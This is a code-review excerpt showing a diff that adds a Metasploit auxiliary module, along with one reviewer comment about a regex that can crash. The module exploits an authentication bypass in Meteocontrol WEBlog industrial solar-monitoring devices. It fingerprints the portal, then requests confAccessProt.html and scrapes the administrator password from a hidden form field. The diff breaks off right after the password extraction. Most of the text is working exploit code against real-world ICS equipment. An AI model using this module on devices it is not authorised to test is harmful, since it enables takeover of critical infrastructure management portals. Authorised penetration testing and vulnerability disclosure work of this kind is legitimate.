modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb

```diff
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Meteocontrol WEBlog Password Extractor',
+      'Description' => %{
+          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal.
+      },
+      'References'  =>
+        [
+             [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ],
+             [ 'CVE', '2016-2296' ],
+             [ 'CVE', '2016-2298' ]
+        ],
+      'Author'         =>
+        [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+    [
+        Opt::RPORT(8080)	# Application may run on a different port too. Change port accordingly.
+    ], self.class)
+  end
+
+  def run_host(ip)
+    unless is_app_metweblog?
+      return
+    end
+
+    do_extract
+  end
+
+  #
+  # Check if App is Meteocontrol WEBlog
+  #
+
+  def is_app_metweblog?
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/html/en/index.html',
+        'method'    => 'GET'
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log")))
+      print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
+      return true
+    else
+      print_error("#{rhost}:#{rport} - Application does not appear to be Meteocontrol WEBlog. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Extract Administrator Password
+  #
+
+  def do_extract()
+
+    print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/html/en/confAccessProt.html',
+        'method'    => 'GET'
+      })
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return
+    end
+
+    if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/)
+      get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
+      admin_password = get_admin_password[1]
```

Comment:
This assumes there will be 2 hits.  if the regex doesn't hit or something changes in the future on the page, it'll crash.